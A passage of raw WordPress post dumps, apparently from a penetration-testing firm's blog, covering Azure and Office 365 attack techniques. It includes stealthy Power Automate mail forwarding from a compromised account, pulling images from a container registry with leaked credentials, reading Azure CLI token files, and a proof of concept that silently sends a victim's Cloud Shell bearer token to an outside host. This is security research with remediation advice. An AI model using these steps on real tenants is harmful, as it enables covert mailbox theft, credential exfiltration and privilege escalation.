5. Name the flow (OutlookForward) and search for the "When a new email arrives (V3)" Office 365 Outlook trigger.


6. Select any advanced options and add a new step.


7. In the added step, search for the Office 365 Outlook connection, and find the "Forward an email (V2)" action.


8. From the "Add dynamic content" link, find "Message Id" and select it for the Message Id.


9. Set your "To" address to the email address that you'd like to forward the message to.

10. Optional, but really recommended - Add one more step "Mark as read or unread (V2)" from the Office 365 Outlook connection, and mark the message as Unread. This will hopefully make the forwarding activity less obvious to the compromised account.


11. Save the flow and wait for the emails to start coming in.

You can also test the flow in the editor. It should look like this:

[Screenshot: successful flow test run]

Taking it further

While forwarding email to an external account is handy, it may not accomplish the goal that we're going for.

Here are a few more ideas for interesting things that could be done with Power Automate:

  • Use "Office 365 Users - Search for users (V2)" to do domain user enumeration
    • Export the results to an Excel file stored in OneDrive
  • Use the enumerated users list as targets for an email phishing message, sent from the compromised account
    • Watch an inbox for the template message, use the message body as your phishing email
  • Connect "OneDrive for Business" and an external file storage provider (Dropbox/SFTP/Google Drive) to mirror each other
    • When a file is created or modified, copy it to Dropbox
  • Connect Azure AD with an admin account to create a new user
    • Trigger the flow with an email to help with persistence.

Fixing the Issue

It looks like it is possible to disable Power Automate for users, but you may have legitimate reasons for using it. Alternatively, Microsoft Flow audit events are available in the Office 365 Security & Compliance Center, so you can at least log and alert on the creation of new flows.

For anyone looking to map these activities back to the Mitre ATT&CK framework, check out these links:

Prior Work

Some related prior Microsoft Flow research was presented at DerbyCon in 2019 by Trent Lo - https://www.youtube.com/watch?v=80xUTJPlhZc

[post_title] => Bypassing External Mail Forwarding Restrictions with Power Automate [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => bypassing-forwarding-restrictions-power-automate [to_ping] => [pinged] => [post_modified] => 2023-06-13 09:48:53 [post_modified_gmt] => 2023-06-13 14:48:53 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11569 [menu_order] => 486 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [27] => WP_Post Object ( [ID] => 11564 [post_author] => 10 [post_date] => 2020-05-12 07:00:00 [post_date_gmt] => 2020-05-12 07:00:00 [post_content] =>

Azure Container Registries are Microsoft's solution for managing Docker images in the cloud. The service allows for authentication with AzureAD credentials, or an "Admin user" that shares its name with the registry.


For the purposes of this blog, let's assume that you've compromised some Admin user credentials for an Azure Container Registry (ACR). These credentials may have been accidentally uploaded to GitHub, found on a Jenkins server, or discovered in any number of random places that you may be able to find credentials.

Alternatively, you may have used the recently updated version of Get-AzPasswords to dump out ACR admin credentials from an Azure subscription. If you already have rights to do that, you may just want to skip to the end of this post to see the AZ CLI commands that you can use instead.


The credentials will most likely be in a username/password format, with a registry URL attached (EXAMPLEACR.azurecr.io).

Now that you have these credentials, we'll go through the next steps that you can take to access the registry and (hopefully) escalate your privileges in the Azure subscription.

Logging In

The login portion of this process is really simple. Enter the username, registry URL, and the password into the following docker command:

docker login -u USER_NAME EXAMPLEACR.azurecr.io

If the credentials are valid, you should get a "Login Succeeded".

Enumerating Container Images and Tags

In order to access the container images, we will need to enumerate the image names and available tags. Normally, I would do this through an authenticated AZ CLI session (see below), but since we only have the ACR credentials, we will have to use the Docker Registry APIs to do this.

For starters we will use the "_catalog" API to list out all of the images for the registry. This needs to be done with authentication, so we will use the ACR credentials in a Basic Authorization (Base64[USER:PASS]) header to request "https://EXAMPLEACR.azurecr.io/v2/_catalog".

Sample PowerShell code:

[Screenshot: sample PowerShell code for the _catalog request]

Now that we have a list of images, we will want to find the current tags for each image. This can be done by making additional API requests to the following URL (where IMAGE_NAME is the one you want the tags for) - https://EXAMPLEACR.azurecr.io/v2/IMAGE_NAME/tags/list

Sample PowerShell code:

[Screenshot: sample PowerShell code for the tags/list requests]
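For reference, the two registry calls described above can also be sketched in Python. This is a best-effort equivalent of the PowerShell shown in the screenshots: the /v2/_catalog and /v2/IMAGE_NAME/tags/list paths and the Basic Authorization (Base64[USER:PASS]) header come from the text above, while the helper names are my own:

```python
import base64
import json
import urllib.request

def basic_auth_header(username, password):
    """Build the Basic Authorization header value: Base64[USER:PASS]."""
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    return f"Basic {token}"

def registry_get(registry, path, username, password):
    """GET an authenticated Docker Registry v2 API path and parse the JSON body."""
    req = urllib.request.Request(
        f"https://{registry}{path}",
        headers={"Authorization": basic_auth_header(username, password)},
    )
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)

def list_images(registry, username, password):
    # /v2/_catalog returns {"repositories": [...]}
    return registry_get(registry, "/v2/_catalog", username, password)["repositories"]

def list_tags(registry, image, username, password):
    # /v2/<image>/tags/list returns {"name": ..., "tags": [...]}
    return registry_get(registry, f"/v2/{image}/tags/list", username, password)["tags"]
```

Usage would look something like `list_tags("EXAMPLEACR.azurecr.io", image, user, password)` for each image returned by `list_images`.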

To make this whole process easier, I've wrapped the above code into a PowerShell function (Get-AzACR) in MicroBurst to help.

PS C:> Get-AzACR -username EXAMPLEACR -password A_$uper_g00D_P@ssW0rd -registry EXAMPLEACR.azurecr.io
docker pull EXAMPLEACR.azurecr.io/arepository:4
docker pull EXAMPLEACR.azurecr.io/dockercore:1234
docker pull EXAMPLEACR.azurecr.io/devabcdefg:2020
docker pull EXAMPLEACR.azurecr.io/devhijklmn:4321
docker pull EXAMPLEACR.azurecr.io/imagetester:10
docker pull EXAMPLEACR.azurecr.io/qatestimage:1023
...

As you can see above, this script will output the docker commands that can be run to "pull" each image (with the first available tag).

Important note: the first tag returned by the APIs may not be the latest tag for the image. The API is not great about returning metadata for the tags, so it's a bit of a guessing game for which tag is the most current. If you want to see all tags for all images, just use the -all flag on the script.

Append the output of the script to a .ps1 file and run it to pull all of the container images to your testing system (watch your disk space). Alternatively, you can just pick and choose the images that you want to look at one at a time:

PS C:> docker pull EXAMPLEACR.azurecr.io/dockercore:1234
1234: Pulling from dockercore
[Truncated]
6638d86fd3ee: Download complete
6638d86fd3ee: Pull complete
Digest: sha256:2c[Truncated]73
Status: Downloaded image for EXAMPLEACR.azurecr.io/dockercore:1234
EXAMPLEACR.azurecr.io/dockercore:1234

Fun fact - This script should also work with regular docker registries. I haven't had a non-Azure registry to try this against yet, but I wouldn't be surprised if this worked against a standard Docker registry server.

Running Docker Containers

Once we have the container images on our testing system, we will want to run them.

Here's an example command for running a container from the dockercore image with an interactive entrypoint of "/bin/bash":

docker run -it --entrypoint /bin/bash EXAMPLEACR.azurecr.io/dockercore:1234

*This example assumes bash is an available binary in the container; bash may not always be available for you.

With access to the container, we can start looking at any local files, and potentially find secrets in the container.
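The file review can be partially automated once you have a container's filesystem locally (for example, via docker export). A rough Python sketch, assuming an exported directory tree; the keyword patterns are illustrative, not exhaustive:

```python
import os
import re

# Illustrative patterns only - tune these for your engagement.
SECRET_PATTERNS = [
    re.compile(r"(?i)(password|passwd|secret|accountkey|client_secret)\s*[=:]\s*\S+"),
    re.compile(r"DefaultEndpointsProtocol=https;AccountName="),  # Azure storage connection strings
]

def scan_for_secrets(root):
    """Walk a directory tree and return (path, line_number, line) for likely secrets."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                with open(path, errors="ignore") as f:
                    for lineno, line in enumerate(f, 1):
                        if any(p.search(line) for p in SECRET_PATTERNS):
                            hits.append((path, lineno, line.strip()))
            except OSError:
                continue  # unreadable file (device node, permissions, etc.)
    return hits
```

Anything this flags still needs manual review, but it narrows down which files in an image are worth reading first.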

Real World Example

For those wondering how this could be practical in the real world, here's an example from a recent Azure cloud pen test.

  1. Azure Storage Account exposed a Terraform script containing ACR credentials
  2. NetSPI connected to the ACR with Docker
  3. Listed out the images and tags with the above process
  4. NetSPI used Docker to pull images from the registry
  5. Ran bash shells on each image and reviewed available files
  6. Identified Azure storage keys, Key Vault keys, and Service Principal credentials for the subscription

TL;DR - Anonymous access to ACR credentials resulted in Service Principal credentials for the subscription

Using the AZ CLI

If you already happen to have access to an Azure subscription where you have ACR reader (or subscription reader) rights on a container registry, the AZ CLI is your best bet for enumerating images and tags.

From an authenticated AZ CLI session, you can list the registries in the subscription:

PS C:> az acr list
[
{
"adminUserEnabled": true,
"creationDate": "2019-09-17T20:42:28.689397+00:00",
"id": "/subscriptions/d4[Truncated]b2/resourceGroups/ACRtest/providers/Microsoft.ContainerRegistry/registries/netspiACR",
"location": "centralus",
"loginServer": "netspiACR.azurecr.io",
"name": "netspiACR",
[Truncated]
"type": "Microsoft.ContainerRegistry/registries"
}
]

Select the registry that you want to attack (netspiACR) and use the following command to list out the images:

PS C:> az acr repository list --name netspiACR
[
"ACRtestImage"
]

List tags for a container image (ACRtestImage):

PS C:> az acr repository show-tags --name netspiACR --repository ACRtestImage
[
"latest"
]

Authenticate with Docker

PS C:> az acr login --name netspiACR
Login Succeeded

Once you are authenticated and have the container image name and tag, the "docker pull" process will be the same as above.

Conclusion

Azure Container Registries are a great way to manage Docker images for your Azure infrastructure, but be careful with the credentials. Additionally, if you are using a premium SKU for your registry, restrict the access for the ACR to specific networks. This will help reduce the availability of the ACR in the event of the credentials being compromised. Finally, watch out for Reader rights on Azure Container Registries. Readers have rights to list and pull any images in a registry, so they may have more access than you expected.

[post_title] => Attacking Azure Container Registries with Compromised Credentials [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => attacking-acrs-with-compromised-credentials [to_ping] => [pinged] => [post_modified] => 2021-06-08 22:00:23 [post_modified_gmt] => 2021-06-08 22:00:23 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11564 [menu_order] => 501 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [28] => WP_Post Object ( [ID] => 18419 [post_author] => 53 [post_date] => 2020-04-16 15:47:52 [post_date_gmt] => 2020-04-16 20:47:52 [post_content] =>
Watch Now

Overview 

As organizations continue to move to the cloud for hosting applications and development, security teams must protect multiple attack surfaces, including the applications and the cloud infrastructure. Additionally, attackers are automated and capable. While these attackers continuously probe for access and vulnerabilities on many different levels, their success usually results from human error in code or infrastructure configurations, such as open admin ports and overprivileged identity roles. 

Learn how to better secure both the application layer and cloud infrastructure, using both automated tools and capable penetration testers to uncover logic flaws and other soft spots. Karl Fosaaen, Practice Director at NetSPI, and Mike Rothman, President at DisruptOps, share how to find and remediate your own vulnerabilities more efficiently before attackers do.

Key highlights: 

Common Pentesting Requirements 

Cloud adoption has seen a notable increase over the past five to 10 years and continues to accelerate. From an application pentesting perspective, a business may already have standard application pentesting requirements as part of the development process.  

Here’s an overview of common pentesting requirements: 

  • Application Testing 
    • Recently ported legacy applications 
    • New applications 
    • Recent or upcoming code pushes 
    • Web/mobile/thick client
  • Network Testing 
    • Internal network 
    • External network 
    • Segmentation testing (PCI)  

Now, a lot of legacy applications are being ported up into cloud environments. This opens up a variety of potential vulnerabilities because of the cloud infrastructure being used, in addition to the fact that a lot of new applications are being built natively in the cloud. 

As new applications are built, security concerns emerge that may not necessarily be taken into consideration. Because of this, pentesting is an effective method to help identify potential security concerns.

Every time new code pushes come up or new developments are made to cloud applications, pentesting those applications as they’re being deployed is important to identify new issues that may arise from an application standpoint. One consideration to keep in mind is that not only are web applications involved in the cloud, but also many mobile applications and thick client applications are hosted in the cloud, allowing new security issues to emerge.

On the network side, more external IPs and internal infrastructure are also being hosted in the cloud, which requires network pentesting.

How do we Pentest “The Cloud?”

When it comes to pentesting the cloud, a best practice is to complete application and network pentesting, as has been the case in the past, and add in a cloud configuration review to take a deeper dive into how services are being configured and used.

Steps to pentest the cloud:

  • Obtain permission, including read access to configurations with the cloud provider, for an in-depth view of networks and applications hosted in the cloud environment 
  • Traditional network/app testing 
    • Traditional vulnerability/port scanners 
    • Nessus, Nmap, Burp Suite, etc. 
  • Cloud configuration review 
    • Automated tools to dump configurations and find issues 
    • Manual review of console/portal interfaces

Focus Services in Cloud Pentesting

From a pentesting and configuration review perspective, some of the most important services include:  

  • Virtual machines 
    • Virtual machine infrastructure as a service is one of the key services where issues from as long as ten years ago are reemerging in cloud environments. Understanding how these services are configured and making sure everything is properly set up is critical. 
  • Serverless code 
    • Serverless code is something worth diving deeper into to learn how the code is executed and run. Similar problems appear across all the different cloud providers from a serverless code perspective and it’s important to see how permissions are applied across different services. 
  • Platform users and groups 
    • How permissions are applied (IAM) 
    • Integrations with identity providers (IDPs/Federation/SSO) 
  • (Potentially) public-facing PaaS services 
    • Web application services 
    • Database services 
    • Data storage

How to Scope your Cloud Pentest  

The next step is understanding how to effectively plan or scope your cloud pentest to secure cloud assets. Some steps to consider include:

  • Gather counts of resources in your environment  
    • Numbers of: 
      • Virtual machines 
      • Public IPs 
      • PaaS services 
  • Include public-facing IPs in your external ranges 
    • Beware of dynamic IPs 
  • Include application testing as part of your scope 
  • Complete a separate cloud environment pentest 
    • Scope should cover app/network/configuration

The Security Hamster Wheel of Pain 

Many businesses are stuck on an endless hamster wheel of pain from a risk management perspective. This is an endless cycle of the following stages:  

  • Ignorance is bliss 
  • Am I hosed?  
  • Yes, the vendor’s tools prove it 
  • Sheer panic 
  • “Fix” problems 

Rather than being stuck on this wheel, businesses need to think more strategically about security operations and understand the reality that the environment is a lot more complicated, and developments are happening a lot faster.

Why is Cloud Security at Scale Hard?

Cloud security is challenging to scale due to several factors, including:

  • Complexity: Hundreds of cloud services and tens of thousands of resources spread across multiple cloud accounts. 
  • Speed of change: DevOps and agile approaches have led to frequent and even continuous change. 
  • Human error: Lack of human expertise and tools leaves issues undetected and unresolved. 
  • Automated attackers: Exposed cloud resources are rapidly discovered and exploited by automated attacks.

Capabilities to Look for in a Cloud SecOps Platform 

A Cloud SecOps platform can help your organization get off the security hamster wheel of pain and improve your overall cloud security.

Top capabilities to look for in a Cloud SecOps platform include:  

  • Serverless: DisruptOps is fully cloud-native and serverless for cloud-scale support. 
  • Event-driven: Internal architecture is completely event-driven for both internal and external events.  
  • Software-as-a-Service (SaaS): DisruptOps is a fully multi-tenant SaaS application. 
  • Secure by design: Security is baked in, including an advanced least-privilege provisioning system.

The Key to Automation: Decisions 

In the past, automation was often a security concern because there were many instances of automation running awry and taking down half a network – or similar examples. However, automation has since become more widely adopted.

As part of the DisruptOps platform, the team built a chatbot that integrates with Slack and Microsoft Teams. The chat sends an alert of any security concerns, along with any actions the team needs to take. Alerts can also be delayed by a set time window, such as 15 minutes or an hour, if a team member doesn’t have time to address the issue right away. Human-integrated automation puts power in the hands of decision-makers.

Top Down Meets Bottom Up 

The decision technology, chatbots, and ability to have humans involved in the process can help increase team members’ comfort with automation. This is an example of when top-down meets bottom-up. Steps include:

  • Identify the issue 
  • Remediate once 
  • Automate 
  • Continuous assessment

Secure Cloud Environments with NetSPI Cloud Penetration Testing 

As cloud environments continue to evolve and expand, and cybercriminals become more sophisticated, organizations are at risk of vulnerabilities, configuration issues, and other threats.  

NetSPI’s Cloud Penetration Testing services can help identify vulnerabilities in cloud infrastructure, reduce organizational risk, and improve cloud security. Our expert cloud pentesters follow manual and automated penetration testing processes and focus on configuration review, external cloud pentesting, and internal network pentesting.  

Learn more about NetSPI’s Cloud Penetration Testing services or schedule a demo with our team to learn more.


[post_title] => Securing The Cloud: Top Down and Bottom Up [post_excerpt] => As organizations continue to move to the cloud for hosting applications and development, security teams must protect multiple attack surfaces, including the applications and cloud infrastructure. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => securing-the-cloud-top-down-and-bottom-up [to_ping] => [pinged] => [post_modified] => 2023-10-05 17:23:13 [post_modified_gmt] => 2023-10-05 22:23:13 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=18419 [menu_order] => 77 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [29] => WP_Post Object ( [ID] => 11373 [post_author] => 10 [post_date] => 2020-04-16 07:00:44 [post_date_gmt] => 2020-04-16 07:00:44 [post_content] => In the previous Azure Managed Identities blog, we covered some simple proof of concept examples for using Azure Virtual Machine Managed Identities to escalate privileges in an Azure subscription. The example code relied on Azure OAuth bearer tokens that were generated from authenticating to the Azure metadata service. Since posting that blog, we've found a handful of other places in Azure that generate similar types of bearer tokens that can be used with the publicly available REST APIs during pen tests. In this follow-up post, we will cover how to collect bearer tokens from additional services and introduce a new scripts section in MicroBurst that can be used with these tokens to gather Azure information, and/or escalate privileges in an Azure subscription.

A Primer on Bearer Tokens

Azure Bearer tokens are the core of authentication/authorization for the Azure APIs. The tokens can be generated from a number of different places and have a variety of uses, but they are a portable token that can be used for accessing Azure REST APIs. The token is in a JWT format that should give you a little more insight about the user it's issued to, once you pull apart the JWT.

For the purposes of this blog, we won't be going into the direct authentication (OAuth/SAML) to login.microsoftonline.com. The examples here will be tied to gathering tokens from existing authenticated sessions or Azure services. For more information on the Microsoft authentication model, here's Microsoft's documentation.

An important thing to note here is the scope of the token. If you only request access to https://management.azure.com/, that's all that your token will have access to. If you want access to other services (https://vault.azure.net/), you should request that in the "scope" (or resource) section of the initial request. In some cases, you may need to request multiple tokens to cover the services you're trying to access. There are "refresh" tokens that are normally used for extending scope for other services, but those won't be available in all of our examples below. For the sake of simplicity, each example listed below is scoped to management.azure.com. For more information on the token structure, please consult the Microsoft documentation.
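As a quick illustration of "pulling apart the JWT": the token is three base64url-encoded segments (header.payload.signature), and the claims live in the middle segment. A minimal Python sketch that decodes the claims without validating the signature - fine for inspection, never for making trust decisions:

```python
import base64
import json

def decode_jwt_claims(token):
    """Decode the payload (claims) segment of a JWT without verifying it."""
    payload = token.split(".")[1]
    # base64url encoding may omit padding; restore it before decoding.
    payload += "=" * (-len(payload) % 4)
    return json.loads(base64.urlsafe_b64decode(payload))
```

Checking `decode_jwt_claims(token)["aud"]` is a quick way to confirm which resource (e.g., https://management.azure.com/) a captured token is actually scoped to.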

Gathering Tokens

Below is an overview of the different services that we will be gathering bearer tokens from in this blog:

Azure Portal

We'll start things off with an easy token to help explain what these bearer tokens look like. Log in to the Azure portal with a proxy enabled, and observe the Bearer token in the Authorization header of the portal's requests.

From a pen tester's perspective, you may be able to intercept a user's web traffic in order to get access to this token. This token can then be copied off to be used in other tools/scripts that need to make requests to the management APIs.

Azure CLI Files

The Azure CLI also uses bearer tokens and stores them in the "c:\Users\%USERNAME%\.azure\accessTokens.json" file. These tokens can be directly copied out of the file and used with the management REST APIs, or if you want to use the AZ CLI on your own system with "borrowed" tokens, you can just replace the contents of the file on your own system to assume those tokens. If you're just looking for a quick way to grab tokens from your currently logged in user, here's some basic PowerShell that will help:
gc c:\Users\$env:USERNAME\.azure\accessTokens.json | ConvertFrom-Json
These tokens are scoped to the management.core.windows.net resource, but there should be a refresh token that you can use to request additional tokens. Chris Maddalena from SpecterOps has a great post that helps outline this (and other Azure tips). Lee Kagan and RJ McDown from Lares also put out a series that covers some similar concepts (relating to capturing local Azure credentials) as well (Part 1) (Part 2).
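Since accessTokens.json is plain JSON, the same extraction works from any language. A Python sketch that reads the cache and optionally filters by resource; the field names (resource, accessToken) match the format the older AZ CLI wrote, so treat them as assumptions if your CLI version differs:

```python
import json
import os

def load_az_cli_tokens(path=None, resource=None):
    """Read the AZ CLI token cache and optionally filter entries by resource URI."""
    if path is None:
        path = os.path.expanduser("~/.azure/accessTokens.json")
    with open(path) as f:
        entries = json.load(f)
    if resource:
        entries = [e for e in entries if e.get("resource") == resource]
    return entries
```

For example, `load_az_cli_tokens(resource="https://management.core.windows.net/")` would pull only the management-scoped entries from a borrowed cache file.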

Virtual Machine Managed Identities

In the previous blog, we covered Virtual Machine Managed Identities and gave two proof of concept examples (escalate to Owner, and list storage account keys). You can see the previous blog to get a full overview, but in general, you can authenticate to the VM Metadata service (different from login.microsoftonline.com) as the Virtual Machine, and use the tokens with the REST APIs to take actions.

From a Managed Identity VM, you can execute the following PowerShell commands to get a bearer token:
$response = Invoke-WebRequest -Uri 'https://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' -Method GET -Headers @{Metadata="true"} -UseBasicParsing
$content = $response.Content | ConvertFrom-Json
$ArmToken = $content.access_token
One of the key things to note here is the fact that the Azure metadata service that we authenticate to requires specific headers to be present when making requests for credentials. This helps reduce the potential impact of a Server-Side Request Forgery (SSRF) attack.

Automation Account "RunAs" Accounts

In order to generate a token from an existing Runbook/Automation Account RunAs account, you will need to create a new (or modify an existing) runbook that authenticates the RunAs account, and then access the token with the runbook code. You can use the following code to accomplish this:
# Get Azure Run As Connection Name
$connectionName = "AzureRunAsConnection"

# Get the Service Principal connection details for the Connection name
$servicePrincipalConnection = Get-AutomationConnection -Name $connectionName

# Logging in to Azure AD with Service Principal
"Logging in to Azure AD..."
$azcontext = Connect-AzureRMAccount -TenantId $servicePrincipalConnection.TenantId `
-ApplicationId $servicePrincipalConnection.ApplicationId `
-CertificateThumbprint $servicePrincipalConnection.CertificateThumbprint

# https://gallery.technet.microsoft.com/scriptcenter/Easily-obtain-AccessToken-3ba6e593
$azureRmProfile = [Microsoft.Azure.Commands.Common.Authentication.Abstractions.AzureRmProfileProvider]::Instance.Profile
$azureRmProfile
$currentAzureContext = Get-AzureRmContext
$profileClient = New-Object Microsoft.Azure.Commands.ResourceManager.Common.RMProfileClient($azureRmProfile)

$token = $profileClient.AcquireAccessToken($currentAzureContext.Tenant.TenantId)
$token | convertto-json
$token.AccessToken
Keep in mind that this token will be for the Automation Account "RunAs" account, so you will most likely have subscription contributor rights with this token.

Added bonus here: if you'd like to stay under the radar, create a new runbook or modify an existing runbook, and use the "Test Pane" to run the code. This will keep the test run from showing up in the job logs, and you can still access the token in the output. This heavily redacted screenshot will show you how the output should look.

This code can also be easily modified to post the token data off to a web server that you control (see the next section). This would be helpful if you're looking for a more persistent way to generate these tokens. If you're going that route, you could also set the runbook to run on a schedule, or potentially have it triggered by a webhook. See the previous Automation Account persistence blog for more information on that.

Cloud Shell

The Azure Cloud Shell has two modes (Bash and PowerShell), but thankfully the same method can be used in both to get a bearer token for the current user.
curl http://localhost:50342/oauth2/token --data "resource=https://management.azure.com/" -H Metadata:true -s
I wasn't able to find exact specifics on the source of this localhost service, but given the Cloud Shell architecture, I'm assuming that the "localhost:50342" service is just used to help authenticate Cloud Shell users for existing tools in the shell, like the AZ CLI.

From a pen tester's perspective, it would be most practical to modify the Cloud Shell home directory (see previous blog) of another (more privileged) user to capture this token and send it off to a server that you control. This is particularly impactful if the victim Cloud Shell has higher privileges than your current user. By appending the following lines of PowerShell to the victim's profile file, you can have Cloud Shell quietly send off a new bearer token as a POST request to a web server that you control (example.com). Proof of concept code:
$token = (curl http://localhost:50342/oauth2/token --data "resource=https://management.azure.com/" -H Metadata:true -s)
Invoke-WebRequest 'http://example.com' -Body $token -Method 'POST' | out-null
*For this example, I just set up a Burp Collaborator host (example.com) to post this token to. Given that this bearer token doesn't carry a refresh token, you may want to modify the PoC code above to request tokens for multiple resources.
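If you do end up gathering tokens for several resources, it helps to confirm what each one is actually scoped to before using it. The sketch below (plain Python, fully offline, not part of MicroBurst) decodes the unsigned payload of a JWT bearer token to read its aud (audience) and exp (expiry) claims; the jwt_claims helper and the fabricated token are illustrative assumptions only.

```python
import base64
import json
import time

def jwt_claims(token: str) -> dict:
    """Decode the (unverified) payload segment of a JWT access token."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)  # restore stripped base64 padding
    return json.loads(base64.urlsafe_b64decode(payload))

# A fabricated token is built here only so the example is self-contained;
# in practice you would paste in the AccessToken gathered above.
claims = {"aud": "https://management.azure.com/", "exp": int(time.time()) + 3600}
fake_token = ".".join([
    base64.urlsafe_b64encode(b'{"alg":"none"}').decode().rstrip("="),
    base64.urlsafe_b64encode(json.dumps(claims).encode()).decode().rstrip("="),
    "",  # no signature on this fabricated token
])
decoded = jwt_claims(fake_token)
print(decoded["aud"])  # the Azure resource this token is scoped to
```

A token whose aud is management.azure.com won't work against, say, Key Vault, which is why requesting tokens for multiple resources is worth the extra lines of PoC code.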

Using the Tokens

Now that we have a token, we will want to make use of it. As a simple proof of concept, we can use the Get-AZStorageKeysREST function in MicroBurst, with a management.azure.com scoped bearer token, to list out any available storage account keys.
Get-AZStorageKeysREST -token YOUR_TOKEN_HERE
This will prompt you for the subscription that you want to use, but you can also specify the desired subscription with the -subscriptionId flag. Stay tuned to the NetSPI blog for future posts, where we will cover how to make use of these tokens with the Azure REST APIs to do information gathering, privilege escalation, and credential gathering. The initial (and future) scripts will be in the REST folder of the MicroBurst repo.
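As a rough illustration of what a call like Get-AZStorageKeysREST does under the hood, this hypothetical Python sketch builds the listKeys management API request that the bearer token is sent with. The function name, placeholder IDs, and api-version are my assumptions for illustration; the request is constructed but deliberately not sent, since that would require a live token.

```python
import urllib.request

def build_list_keys_request(token, subscription_id, resource_group, account):
    # POST .../listKeys returns the storage account's access keys when the
    # bearer token carries sufficient rights (Contributor or better).
    url = (
        "https://management.azure.com/subscriptions/{}/resourceGroups/{}"
        "/providers/Microsoft.Storage/storageAccounts/{}"
        "/listKeys?api-version=2019-06-01"
    ).format(subscription_id, resource_group, account)
    return urllib.request.Request(
        url,
        data=b"",  # empty POST body
        method="POST",
        headers={"Authorization": "Bearer " + token},
    )

# Placeholder values; swap in a real token and resource names to use it.
req = build_list_keys_request(
    "YOUR_TOKEN_HERE",
    "00000000-0000-0000-0000-000000000000",
    "MyResourceGroup",
    "mystorageaccount",
)
# urllib.request.urlopen(req) would send the call; omitted here since it
# needs network access and a valid token.
```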

Conclusion

While this isn't an exhaustive list, there are lots of ways to get bearer tokens in Azure, and while they may have limited permissions (depending on the source), they can be handy for information gathering, persistence, and/or privilege escalation in certain situations. Feel free to let me know if you've had a chance to make use of Azure Bearer tokens down in the comments, or out in the MicroBurst GitHub repository. [post_title] => Gathering Bearer Tokens from Azure Services [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => gathering-bearer-tokens-azure [to_ping] => [pinged] => [post_modified] => 2021-06-11 15:19:21 [post_modified_gmt] => 2021-06-11 15:19:21 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11373 [menu_order] => 509 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [30] => WP_Post Object ( [ID] => 19769 [post_author] => 53 [post_date] => 2020-03-04 10:41:04 [post_date_gmt] => 2020-03-04 10:41:04 [post_content] =>

Watch the first webinar in our Lunch & Learn Series below!

With the increase in hybrid cloud adoption that extends traditional Active Directory domain environments into Azure, penetration tests and red team assessments are more frequently bringing Azure tenants into the engagement scope. Attackers often find themselves with an initial foothold in Azure, but short on ideas for what an escalation path would look like.

In this webinar, Karl Fosaaen covers some of the common initial Azure access vectors, along with a handful of escalation paths for getting full control over an Azure tenant. In addition to this, he covers some techniques for maintaining that privileged access after an initial escalation. Throughout each section, he shares some of the tools that can be used to help identify and exploit the issues outlined.

https://youtu.be/zzP3HSWyu4M
[post_title] => Adventures in Azure Privilege Escalation Webinar [post_excerpt] => During this webinar, NetSPI’s Karl Fosaaen will cover some of the common initial Azure access vectors, along with a handful of escalation paths for getting full control over an Azure tenant. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => adventures-in-azure-privilege-escalation-webinar [to_ping] => [pinged] => [post_modified] => 2023-03-16 09:07:49 [post_modified_gmt] => 2023-03-16 14:07:49 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=19769 [menu_order] => 79 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [31] => WP_Post Object ( [ID] => 17411 [post_author] => 53 [post_date] => 2020-02-26 10:40:32 [post_date_gmt] => 2020-02-26 16:40:32 [post_content] =>
Watch Now

Overview 

Nearly every organization is talking about moving to the cloud, developing a strategy to move to the cloud, in the process of moving to the cloud, or already all in on the cloud. Where do you fall in this journey?  

Join two of NetSPI’s cloud security experts, VP of Research Karl Fosaaen and former CISO/Managing Director Bill Carver to learn if your cloud assets are as protected as you think they are. 

Key highlights:

Moving to the Cloud 

Cloud security is challenging, and many companies are behind in protecting their cloud assets. Part of the reason is that for years, the cloud was seen as a buzzword, and companies often thought it wouldn’t have much of an impact from a security perspective. Even some experienced security professionals have minimized or overlooked the security challenges associated with the cloud.  

Now, nearly every organization is either: 

  • Talking about moving to the cloud 
  • Developing a strategy to move to the cloud 
  • In the process of moving to the cloud 
  • Already in the cloud 

However, from a security perspective, the narrative has often been:

  • Cloud providers are taking care of security 
  • Cloud security is the same as traditional security 
  • Cloud security expertise has kept pace 
  • Outsourcing your assets reduces risk 

In some cases, individuals within companies have taken shortcuts by adopting the cloud and using cloud applications without information security oversight, which presents significant risks from a security perspective. And this leaves security professionals behind in implementing best practices to effectively protect organizations’ cloud assets. 

Are Your Cloud Assets as Protected as You Think? 

Given the momentum surrounding moving to the cloud and the fact that most security teams have been slow to respond, cloud assets likely aren't as protected as some may think.  

Some challenges with securing cloud assets include:

  • Despite available resources, there are still many ways to configure services incorrectly 
  • Public and non-public breaches seem to happen weekly, and the maturity of information security programs doesn’t seem to influence the likelihood of a breach  
  • A single mistake in a cloud environment could be disastrous 
  • Many of the technologies and designs that have resulted in recent cloud breaches are used in most environments  

Common Cloud Security Challenges  

At NetSPI, our expert human pentesters regularly run cloud penetration tests against client environments. A common pattern is that similar issues are found across different platforms, environments, and verticals.  

Top challenges include:

  • Credentials can be obtained by numerous sources: By utilizing common vulnerabilities, public data exposures, and active credential guessing attacks, attackers can gain access to cloud environments.  
  • Properly configuring permissions can be difficult: Security can often take a backseat when developers are trying to be agile. 
  • Integrating cloud can create risk for on-premise technology: By integrating cloud and on-premise environments, organizations are making it easier for attackers to pivot into traditional (often less secure) network resources.
Be Proactive with Cloud Pentesting

